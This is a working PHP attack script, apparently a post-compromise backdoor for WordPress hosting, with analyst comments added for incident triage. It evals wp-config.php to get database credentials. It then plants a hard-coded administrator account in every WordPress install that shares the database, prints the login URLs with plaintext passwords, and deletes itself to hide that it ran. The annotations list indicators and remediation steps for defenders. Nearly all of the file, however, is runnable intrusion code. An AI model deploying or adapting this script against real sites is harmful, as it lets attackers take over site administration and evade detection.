<?php
/*
 * Analyst summary of what the code below does, as written:
 *  - looks for wp-config.php beside this file or one directory up and eval()s
 *    its contents to obtain the DB_* constants, without loading WordPress;
 *  - connects to MySQL with those credentials and lists every table whose name
 *    ends in "_options", treating each one as a separate WordPress install;
 *  - for each install that has a siteurl, inserts a row into <prefix>users and
 *    usermeta rows granting the administrator role, unless a user with the
 *    hard-coded login or e-mail already exists;
 *  - prints a per-site report that includes the plaintext credentials, then
 *    unlinks its own file.
 *
 * Triage notes: the file removes itself, so its absence on disk says nothing
 * about whether it ran; the durable traces are the rows it writes (the
 * user_login / user_email from $new_admin, user_registered timestamp, and the
 * usermeta entries) plus the web-server access log entry for the request.
 * The database credentials in wp-config.php should be treated as exposed and
 * rotated, and every users table in the database reviewed, not only the one
 * belonging to the site where the file was found.
 */
error_reporting(E_ALL);
ini_set('display_errors', 1);
echo "<html><body><pre>";

/* STEP 1: Locate wp-config.php */
// Candidates: this file's directory, then its parent directory.
$paths = array(
    __DIR__ . '/wp-config.php',
    dirname(__DIR__) . '/wp-config.php'
);
$wp_config = null;
foreach ($paths as $path) {
    if (file_exists($path)) {
        $wp_config = $path;
        break;
    }
}
if (!$wp_config) {
    die("❌ wp-config.php not found.\n");
}

/* STEP 2: Load wp-config.php WITHOUT loading WordPress core */
// Parse wp-config.php manually to avoid function conflicts
// NOTE(review): the PHP open/close tags are stripped and the remaining text is
// executed with eval(), so every statement in wp-config.php runs here, not
// only the define() calls.
$wp_config_content = file_get_contents($wp_config);
$wp_config_content = str_replace(array('<?php', '<?', '?>'), '', $wp_config_content);
eval($wp_config_content);

/* STEP 3: Check DB constants */
// Only DB_NAME is tested; DB_USER and DB_PASSWORD are read unconditionally.
if (!defined('DB_NAME')) {
    die("❌ Database constants not found.\n");
}
$db_host = defined('DB_HOST') ? DB_HOST : 'localhost';
$db_name = DB_NAME;
$db_user = DB_USER;
$db_pass = DB_PASSWORD;

/* STEP 4: Connect to database */
$conn = new mysqli($db_host, $db_user, $db_pass, $db_name);
if ($conn->connect_error) {
    die("❌ Database connection failed: " . $conn->connect_error . "\n");
}
echo "✅ Connected to database: {$db_name}\n\n";
echo "==== WordPress Sites Found ====\n\n";

/* STEP 5: Find all *_options tables */
// The backslash makes the underscore literal in LIKE, so this matches table
// names ending in "_options" under any prefix in the connected database.
$result = $conn->query("SHOW TABLES LIKE '%\_options'");
if (!$result || $result->num_rows == 0) {
    die("❌ No WordPress option tables found.\n");
}

/* Admin credentials */
// Hard-coded account written into every site found; these three values are
// the indicators to search for in the users tables.
$new_admin = array(
    'email' => 'whoami@example.com',
    'username' => 'r3dc0d3r',
    'password' => 'r3dc0d3r123'
);

// Custom sanitize function (different name to avoid conflict)
/**
 * Reduce a string to a lowercase slug.
 *
 * Strips tags, lowercases, drops characters other than a-z, 0-9, underscore,
 * whitespace and hyphen, collapses runs of whitespace/hyphens into one hyphen,
 * then drops anything that is not a-z, 0-9 or hyphen (which removes the
 * underscores kept by the first pass).
 *
 * @param string $title Input text.
 * @return string Slug used below for user_nicename.
 */
function custom_sanitize_title($title) {
    $title = strip_tags($title);
    $title = preg_replace('/[^a-z0-9_\s-]/', '', strtolower($title));
    $title = preg_replace('/[\s-]+/', '-', $title);
    $title = preg_replace('/[^a-z0-9-]/', '', $title);
    return $title;
}

// Password hashing function
/**
 * Produce the string stored in user_pass for the inserted account.
 *
 * Returns wp_hash_password() when that function is defined; otherwise builds
 * "$P$B" + an 8-character salt + an encoding of the first 16 bytes of an
 * iterated raw MD5 digest.
 *
 * @param string $password Plaintext password.
 * @return string Hash string as described above.
 */
function create_wp_password_hash($password) {
    // Check if we're in WordPress context with password functions
    if (function_exists('wp_hash_password')) {
        return wp_hash_password($password);
    }

    // For standalone use, create a WordPress-compatible hash
    // This generates a hash similar to what WordPress uses
    $itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';

    // Generate random salt
    // Eight characters picked from the 64-character alphabet via mt_rand().
    $salt = '';
    for ($i = 0; $i < 8; $i++) {
        $salt .= $itoa64[mt_rand(0, 63)];
    }

    // Create hash with multiple iterations (WordPress uses 8192 by default)
    $hash = md5($salt . $password, true);
    for ($i = 0; $i < 8191; $i++) {
        $hash = md5($hash . $password, true);
    }

    // Format: $P$B[8-char salt][22-char hash]
    $hash_output = '$P$B' . $salt . custom_hash_encode64($hash, 16, $itoa64);
    return $hash_output;
}

/**
 * Encode the first $count bytes of $input using the alphabet in $itoa64.
 *
 * Bytes are combined up to three at a time into a little-endian value and
 * emitted six bits per output character, lowest bits first.
 *
 * @param string $input  Raw bytes to encode.
 * @param int    $count  Number of bytes of $input to consume.
 * @param string $itoa64 64-character output alphabet.
 * @return string Encoded text.
 */
function custom_hash_encode64($input, $count, $itoa64) {
    $output = '';
    $i = 0;
    do {
        $value = ord($input[$i++]);
        $output .= $itoa64[$value & 0x3f];
        if ($i < $count) {
            $value |= ord($input[$i]) << 8;
        }
        $output .= $itoa64[($value >> 6) & 0x3f];
        if ($i++ >= $count) {
            break;
        }
        if ($i < $count) {
            $value |= ord($input[$i]) << 16;
        }
        $output .= $itoa64[($value >> 12) & 0x3f];
        if ($i++ >= $count) {
            break;
        }
        $output .= $itoa64[($value >> 18) & 0x3f];
    } while ($i < $count);
    return $output;
}

// Main processing loop
// Counters reported in the summary printed at the end.
$sites_processed = 0;
$admin_created = 0;
$admin_exists = 0;

while ($row = $result->fetch_array()) {
    // One iteration per *_options table; the table prefix is derived by
    // removing the text "options" from the table name.
    $options_table = $row[0];
    $prefix = str_replace('options', '', $options_table);
    $users_table = $conn->real_escape_string($prefix . 'users');
    $usermeta_table = $conn->real_escape_string($prefix . 'usermeta');
    $options_table_escaped = $conn->real_escape_string($options_table);

    /* Get site URLs */
    $sql = "SELECT option_name, option_value FROM `{$options_table_escaped}` WHERE option_name IN ('siteurl', 'home', 'blogname')";
    $res = $conn->query($sql);

    if ($res && $res->num_rows > 0) {
        $siteurl = '';
        $home = '';
        $blogname = '';
        while ($opt = $res->fetch_assoc()) {
            if ($opt['option_name'] === 'siteurl') {
                $siteurl = $opt['option_value'];
            }
            if ($opt['option_name'] === 'home') {
                $home = $opt['option_value'];
            }
            if ($opt['option_name'] === 'blogname') {
                $blogname = $opt['option_value'];
            }
        }

        // Tables without a siteurl value are skipped entirely.
        if (!empty($siteurl)) {
            $sites_processed++;
            // Values read from the database are echoed into the HTML response
            // without escaping.
            echo "[{$sites_processed}] Site Found:\n";
            echo " Prefix : {$prefix}\n";
            echo " Site Name: {$blogname}\n";
            echo " Site URL : {$siteurl}\n";
            echo " Home URL : {$home}\n";

            /* Check if user already exists */
            $escaped_username = $conn->real_escape_string($new_admin['username']);
            $escaped_email = $conn->real_escape_string($new_admin['email']);
            $check_sql = "SELECT ID FROM `{$users_table}` WHERE user_login = '{$escaped_username}' OR user_email = '{$escaped_email}'";
            $check_result = $conn->query($check_sql);

            if ($check_result && $check_result->num_rows > 0) {
                echo " ⚠️ Admin user already exists\n";
                $admin_exists++;
                // The credentials are appended after '#'; a URL fragment is not
                // sent to the server, so they will not show up in access logs.
                $login_url = rtrim($siteurl, '/') . '/wp-login.php#' . urlencode($new_admin['username']) . '@' . urlencode($new_admin['password']);
                echo " Login URL: {$login_url}\n";
            } else {
                /* Create new admin user */
                $hashed_password = create_wp_password_hash($new_admin['password']);
                // Timestamp comes from the PHP process clock and default
                // timezone at the moment the script ran.
                $user_registered = date('Y-m-d H:i:s');
                $user_nicename = custom_sanitize_title($new_admin['username']);

                $escaped_user_login = $conn->real_escape_string($new_admin['username']);
                $escaped_user_pass = $conn->real_escape_string($hashed_password);
                $escaped_user_nicename = $conn->real_escape_string($user_nicename);
                $escaped_user_email = $conn->real_escape_string($new_admin['email']);
                $escaped_display_name = $conn->real_escape_string($new_admin['username']);

                // Insert user
                // Written straight to the table, so no WordPress hooks or
                // plugin-level audit logging are involved in this insert.
                $insert_sql = "INSERT INTO `{$users_table}` (user_login, user_pass, user_nicename, user_email, user_registered, display_name) VALUES ( '{$escaped_user_login}', '{$escaped_user_pass}', '{$escaped_user_nicename}', '{$escaped_user_email}', '{$user_registered}', '{$escaped_display_name}' )";
                $insert_result = $conn->query($insert_sql);

                if ($insert_result) {
                    $new_user_id = $conn->insert_id;
                    if ($new_user_id) {
                        // Add user meta (capabilities)
                        // Serialized PHP array naming the administrator role;
                        // stored under "<prefix>capabilities" together with
                        // "<prefix>user_level" = 10.
                        $capabilities_meta = 'a:1:{s:13:"administrator";b:1;}';
                        $meta_queries = array(
                            array($new_user_id, $prefix . 'capabilities', $capabilities_meta),
                            array($new_user_id, $prefix . 'user_level', '10'),
                            array($new_user_id, 'nickname', $new_admin['username']),
                            array($new_user_id, 'first_name', ''),
                            array($new_user_id, 'last_name', ''),
                            array($new_user_id, 'description', '')
                        );

                        foreach ($meta_queries as $meta) {
                            $escaped_user_id = $conn->real_escape_string($meta[0]);
                            $escaped_meta_key = $conn->real_escape_string($meta[1]);
                            $escaped_meta_value = $conn->real_escape_string($meta[2]);
                            $meta_sql = "INSERT INTO `{$usermeta_table}` (user_id, meta_key, meta_value) VALUES ('{$escaped_user_id}', '{$escaped_meta_key}', '{$escaped_meta_value}')";
                            // Result of each usermeta insert is not checked.
                            $conn->query($meta_sql);
                        }

                        echo " ✅ Admin user created (ID: {$new_user_id})\n";
                        $admin_created++;

                        // Create login URL with credentials in fragment
                        $login_url = rtrim($siteurl, '/') . '/wp-login.php#' . urlencode($new_admin['username']) . '@' . urlencode($new_admin['password']);
                        echo " Login URL: {$login_url}\n";
                    } else {
                        echo " ❌ Failed to get new user ID\n";
                    }
                } else {
                    echo " ❌ Failed to create admin user: " . $conn->error . "\n";
                }
            }
            echo " " . str_repeat("-", 50) . "\n";
        }
    }
}

// Close connection
$conn->close();

echo "\n📊 SUMMARY:\n";
echo "===========\n";
echo "Sites processed : {$sites_processed}\n";
echo "Admin created : {$admin_created}\n";
echo "Admin exists : {$admin_exists}\n";
echo "\n";
echo "✅ Process completed.\n";

/* AUTO SELF-DELETION - Added at the very end without changing other code */
// The file unlinks itself after one run; unlink() errors are suppressed with @
// and only reported through the echoed message.
echo "\n🗑️ Auto-deleting script...\n";
$current_script = __FILE__;
if (file_exists($current_script)) {
    if (@unlink($current_script)) {
        echo "✅ Script deleted successfully.\n";
        echo "⚠️ This page will stop working if refreshed.\n";
    } else {
        echo "⚠️ Could not auto-delete script. Please delete manually: " . basename($current_script) . "\n";
    }
}

// Flush output to ensure everything is displayed before script termination
ob_flush();
flush();
echo "</pre></body></html>";
?>